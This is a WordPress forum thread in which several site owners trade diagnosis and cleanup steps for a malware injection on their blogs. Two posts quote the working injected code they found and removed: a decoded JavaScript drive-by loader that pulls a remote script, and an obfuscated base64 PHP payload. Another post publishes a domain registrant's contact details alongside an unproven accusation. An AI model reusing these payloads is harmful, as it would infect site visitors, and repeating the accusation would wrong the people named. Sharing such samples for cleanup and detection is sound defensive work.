WordPress.org

Ready to get started?Download WordPress

Forums

Blog infected with malware (26 posts)

  1. HalfAsstic
    Member
    Posted 4 years ago #

    My blog is infected with malware on the site. I have changed my password and installed the WPMalwatch. It was run and found nothing.
    Some of the links my readers are seeing on the sign that pops up as a warning are:
    Threat Name: Exploit Phoenix Exploit Kit (Type 1112)
    File Name: decorum76.info/e9t/
    And:
    "The website at http://www.halfasstic.com contains elements from the site novelounge.com, which appears to host malware - software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
    For detailed information about the problems with these elements, visit the Google safe browsing diagnostic page for novelounge.com."

    1. Can anyone tell me what to do to get this off of my blog?
    2. If this is something that is over my head, who can I hire to do it for me?
    Thanks so much!

  2. stevesearer
    Member
    Posted 4 years ago #

    I had the same issue you are describing, but was able to find and get rid of the problem. Basically, I noticed a couple oddities occur before the Malware warning occurred.

    1) The main one was the fact that there were 2 new admin users that I had not created. I promptly deleted those.

    2) After realizing that there must have been code inserted into the website, I began searching through the template files to see if I found anything fishy. When I opened the 'Page Template' file, I noticed an extremely long and gibberish looking php string that began with "<?php $o =". I promptly deleted that as well.

    After doing both of these things, as well as clearing the cookie and site data in Chrome, revisiting my website seems to be working again without the Malware warning.

  3. stevesearer
    Member
    Posted 4 years ago #

    3) I also changed my password and instructed the other admins on my site to do the same.

  4. zackisaiah
    Member
    Posted 4 years ago #

    I had the same problem. All of the WordPress sites on my MediaTemple gridserver were infected. Chrome gave me the "novelounge.com" malware warning.

    Initially, I updated to WP 3.0 and removed the "JohnnyA" admin user that had appeared. This seemed to solve the problem. The next day, however, I got the malware warning again.

    Checked out the functions.php file and sure enough the "<?php $o =" code was there. Found it in archive.php on a different site. Removed it, and the malware warnings went away. I'll be monitoring the sites in the meantime to make sure the problem is truly fixed.

  5. cleave
    Member
    Posted 4 years ago #

    I've been experiencing the same problem on all of my sites. pomomusings.com had the warning, as did cleavedesign.com and another site, sarahwalkercleaveland.com, I can't even get into the wp-admin.

    I have over 20+ sites hosted with MediaTemple and it looks like this is a problem with their server. Have you brought it to their attention yet?

    I'm on vacation in Hawaii trying to get in to WordPress admins on my iPad and trying to make some of these changes....

    Peace,
    Adam

  6. stevesearer
    Member
    Posted 4 years ago #

    Adam, you are correct with it being a MediaTemple issue. The link is here:

    http://weblog.mediatemple.net/weblog/category/system-incidents/1378-information-about-compromised-sites

  7. stevesearer
    Member
    Posted 4 years ago #

    The problem came up again today, though I have been unsuccessful in identifying where the novelounge.com code is being inserted into my website.

    However, I did delete unused plugins, one being a contact form plugin that became activated mysteriously (I don't remember activating it). I also cleared the WP-Super-cache and the problem seems to be gone at this point. But after thinking I was successful yesterday, I am not going to be over-confident.

    The domain is officesnapshots.com, if anyone wants to check it out and let me know if they are receivign the warnign in Google Chrome, I'd really appreciate it.

    Thanks!

  8. zackisaiah
    Member
    Posted 4 years ago #

    Got the malware warning again on one of the sites I thought I fixed. (I had removed the mysterious user with admin privileges, removed the "<?php $o =" code, and reset the password for my wp admin account.)

    This time, I cleared the wp-super-cache data and deactivated the plugin entirely, and that cleared the malware warning (for now). I realized I had not changed passwords for other administrators on the site, so I did that and noticed that WordPress said I had one more administrator than I was seeing. The user count says "Administrator (4)" but I only see three. I checked the wp_users table in the database, and no sign of the ghost admin. Hmm...

    Looks like I have to dig deeper.

    (Steve: I didn't get the malware warning on your site.)

  9. johnferris
    Member
    Posted 4 years ago #

    Stevesearer – interesting I also installed a contact form plugin (TDO Mini Forms) a day or two before I also got hit with the same problem? Anyone else got that plugin? Media Temple are very helpful - pretty much delete and start again. Very handy when you've 600 posts and images etc. to deal with. Anyone know if this malware causes any damage to anyone who opens? I'm sending an email out to readers and I'd like to say something.

  10. stevesearer
    Member
    Posted 4 years ago #

    Hey guys, so I think I may have gotten rid of whatever the problem was. We'll see in a day or so if it stays non-Malwared (word?).

    Here are the things I did:
    -Uninstalled unused plugins
    -changed wordpress passwords
    -updated wordpress
    -reuploaded and overwrote all wordpress files
    -changed ftp password
    -changed ftp to secure protocol for when I connect
    -changed Mysql passwords
    -manually deleted malicious code on site using the following tool:

    http://jsunpack.jeek.org/dec/go?

    I would enter my domain name into the box and click submit URL's. It might take some time, but eventually it would spit out a bunch of data. I would just scroll through each entry and look for where the code had been placed. I'd say that doing that after you change all of your passwords as my research made it seem as it compromised passwords was the issue.

    -Steve

  11. zackisaiah
    Member
    Posted 4 years ago #

    Got a message from MT this morning:

    We may have an additional "cleanup" option available via a third party. We hope to announce plans about that at the end of this week. Please stay tuned to our Status Blog for more details.

  12. zackisaiah
    Member
    Posted 4 years ago #

    Thanks for that very helpful link, Steve.

    I scanned one of my affected sites and this is what jsunpack decoded:
    //document.write (s) <script type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("watchtime")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["edisonsnightclub.com","gaindirectory.org","ideacoreportal.com","karenegren.com"],e=["aqua.","azure.","black.","blue.","brown.","chocolate.","coral.","cyan.","darkred.","fuchsia.","gold.","gray.","green.","indigo.","ivory.","khaki.","lime.","magenta.","maroon.","navy.","olive.","orange.","pink.","plum.","purple.","red.","silver.","snow.","violet.","white.","yellow."],f=Math.floor(Math.random()* d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="watchtime="+escape("watchtime")+";expires="+dt.toGMTString()+";path=/";document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/data/mootools.js"><\/script>')};</script>

    Removed the code from the file, but have yet to change all of my passwords...

  13. Media Temple
    Member
    Posted 4 years ago #

    We just wanted to clear the air of some of the confusion surrounding recent hacks on WordPress installations hosted on (mt) Media Temple.

    This issue does not relate to previous security incidents #1167 and #1026 - which were absolutely reflective of an inadequately secure architecture. We've accepted responsibility for those past issues, corrected them and have done so publicly: http://weblog.mediatemple.net/weblog/category/system-incidents/gs-investigating-potential-exploit/ and http://weblog.mediatemple.net/weblog/category/system-incidents/1026-gs-security-advisory/. In total, we've observed that these more recent attacks are site-specific, and do not represent a hosting-level compromise.

    We have provided some significant guidance and support for our customers experiencing these problems on our System Status Blog: http://weblog.mediatemple.net/weblog/category/system-incidents/1378-information-about-compromised-sites/

  14. johnferris
    Member
    Posted 4 years ago #

    Steve, I deleted the malicious code, deleted the user Johnny A, changed passwords and two days later I'm back to having a different Malware. Nice of Media Temple to offer the solution to start again but when you've customized templates etc. it's not that simple.

  15. chinmoy
    Member
    Posted 4 years ago #

    set the php files permission is 404 or 444, js files is 555 and folders are 555. Don't give the "write" permission to files and folders. Plz check all js files thoroughly. You will see document.write('.....'); code at the bottom of every js file. Remove that kind of code from js file. Change the ftp details, email and admin password.

  16. Arian Xhezairi
    Member
    Posted 4 years ago #

    Luckily MT fellers have reacted right in time I'd say, although couple of our visitors might have been kicked away from our loved WordPress blogs and sites.

    They've come up with a very easily solution.

    Here's full details on this matter: http://wiki.mediatemple.net/w/WordPress_Redirect_Exploit

    Carry on WordPressing friends.

  17. zackisaiah
    Member
    Posted 4 years ago #

    None of my sites had the malicious code in the wp_posts table as MT warned. I did, however, have the Malware Detected! warning in Chrome. I've managed to clean my sites. Here are the steps I took:

    1. Upgrade to WP 3.0
    2. Delete the "JohnnyA" admin user (this was the only variation I saw, though there may be others.)
    3. Scan all of the theme files for malicious code. 95% of the time the code was found on a standard theme file (such as header.php), but I did find it on some custom template files as well. On one site I found the code buried inside of an old "Statcounter" script.
    4. Go to http://jsunpack.jeek.org/dec/go and scan the site for code inserted in plugins or the wp-includes folder. It was usually found in the Google Analyticator or Cryptx plugins (which I simply deleted and re-installed). In other instances, it was in the wp-includes jquery or thickbox files.
    5. Delete the wp-super-cache cache and back to normal.

    For good measure I changed admin and db passwords, but the sites I haven't changed yet haven't had a recurrence. While this has been a hassle, it's gotten me off my butt to lock down the security on all my sites.

  18. Michelle Panulla
    Member
    Posted 4 years ago #

    I've had the same issue, and believe there is a back door somewhere in my client's WordPress installation. I installed the WordPress File Monitor plugin after the initial hacking, and it alerted me today that more malicious files were added yesterday, despite removing all malicious code previously.

    I also discovered that two plugins were installed and activated that I did not put there: "Redirect" for redirecting via custom fields and "Search & Replace" for replacing strings in the database.

    I'm biting the bullet and doing a fresh WordPress installation, along with repeating all the password changes, etc. I've already done.

  19. johnferris
    Member
    Posted 4 years ago #

    You all seem to have lucked out. I have changed database passwords, WordPress login passwords, deleted the admin users that shouldn't have been on there. All of the above and the frickin' thing keeps coming back. I have 11 sites based on WordPress and five of them are infected. The thought of having to redo all the customisation etc. is killing me.

  20. Roy
    Member
    Posted 4 years ago #

  21. johnferris
    Member
    Posted 4 years ago #

    Thanks Roy, I think it's going to be best to start from scratch again. Wipe directories and databases and start afresh, I can copy the text and images down, last thing we need is anyone getting the Malware message – though the one saving grace is that the sites infected are for annual events and are very rarely read at other times of the year.

  22. Roy
    Member
    Posted 4 years ago #

    I'll leave it to you to judge what's least work. Be aware of images though. Hacks often contain bogus jpg's.

  23. sahaskatta
    Member
    Posted 3 years ago #

    Okay, a few of my websites and sites that I manage for others were hacked from the same ideacoreportal.com. All were on different servers, different accounts, different passwords, etc. One of them was a MediaTemple server.

    How exactly can we report or have that company stopped from what they are doing?

    The following company also owns these domains that were part of the redirect script: ["edisonsnightclub.com","gaindirectory.org","ideacoreportal.com","karenegren.com"]

    Registrant:
       IDEACore LLC
       22552 King Richard Ct.
       Beverly Hills, Michigan 48025
       United States
    
       Domain Name: IDEACOREPORTAL.COM
          Created on: 14-Jan-05
          Expires on: 14-Jan-11
          Last Updated on: 15-Jan-10
    
       Administrative Contact:
          Craig, Joseph
          IDEACore LLC
          22552 King Richard Ct.
          Beverly Hills, Michigan 48025
          United States
          2484333380      Fax -- 
    
       Technical Contact:
          Craig, Joseph
          IDEACore LLC
          22552 King Richard Ct.
          Beverly Hills, Michigan 48025
          United States
          2484333380      Fax -- 
    
       Domain servers in listed order:
          NS51.DOMAINCONTROL.COM
          NS52.DOMAINCONTROL.COM
  24. Repeel
    Member
    Posted 3 years ago #

    Sahaskatta, these assumptions are all wrong, it's an acknowledged hack of servers that were not in the possession or control of the people or entities you list above. The owners of the domains are definitely not complicit, nor was it likely that the originating poster was.

    The Phoenix Exploit in kit has been implicated in issues in the realm of these posts.

    See http://community.websense.com/blogs/securitylabs/archive/2010/08/05/Media-Temple-injections-lead-to-Phoenix-Exploit-Kit.aspx

    and http://blogs.computerworld.com/16904/mass_injections_and_malware_continue_at_media_temple

    It's not a good idea or fair to place in a blog post, the data above, when you're not certain about the facts, as erroneous information defames the parties.

    As much as you want to "have that company stopped", the ones you unwittingly think are behind this, they probably want to stop you or Skattertech from spreading false impressions.

    Someone attempted to maliciously point those domains to a hacked server, but the domains and contacts you list were surely not complicit. This could even be a registrar breach.

    The domains above don't show any involvement with this attack and are clean.

    Sahaskatta and zackisaiah - to be fair and more important, to be accurate, you should remove these errant publications of opinions/assumptions about the domains and registrants.

  25. iPhone Repairs
    Member
    Posted 3 years ago #

    Just removed malicious code from my site http://www.onsiteiphonerepairs.co.uk found in SEO plugin:

    eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5dFpYRmhjMmh2Y0hCbGNtbHVabTh1WTI5dEwycHpMbkJvY0NJK1BDOXpZM0pwY0hRKyIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKTsgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PTEwOyAgICAgICRSQTNENTJFNTJBNDg5MzZDREUwRjUzNTZCQjA4NjUyRjI9MDsgICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjQpeyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPUB1bnBhY2soJ3YnLHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDEwLDIpKTsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj0kUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCWzFdOyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yKyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmOCl7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjE2KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTI7ICAgICAgfSAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9QGd6aW5mbGF0ZShAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkpOyAgICAgIGlmKCRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9PT1GQUxTRSl7ICAgICAgICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9JFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QzsgICAgICB9ICAgICAgcmV0dXJuICRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM7ICAgICB9ICAgIH0gICAgZnVuY3Rpb24gbXJvYmgoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qil7ICAgICBIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTsgICAgICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREU9Z3pkZWNvZGUoJFJFODJFRTlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qik7ICAgICAgIGlmKHByZWdfbWF0Y2goJy9cPFwvYm9keS9zaScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSkpeyAgICAgIHJldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxcL2JvZHlbXlw+XSpcPikvc2knLGdtbCgpLiJcbiIuJyQxJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKTsgICAgIH1lbHNleyAgICAgIHJldHVybiAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFLmdtbCgpOyAgICAgfSAgICB9ICAgIG9iX3N0YXJ0KCdtcm9iaCcpOyAgIH0gIH0="));?>
    <?php

    Hope this helps someone!

Topic Closed

This topic has been closed to new replies.

About this Topic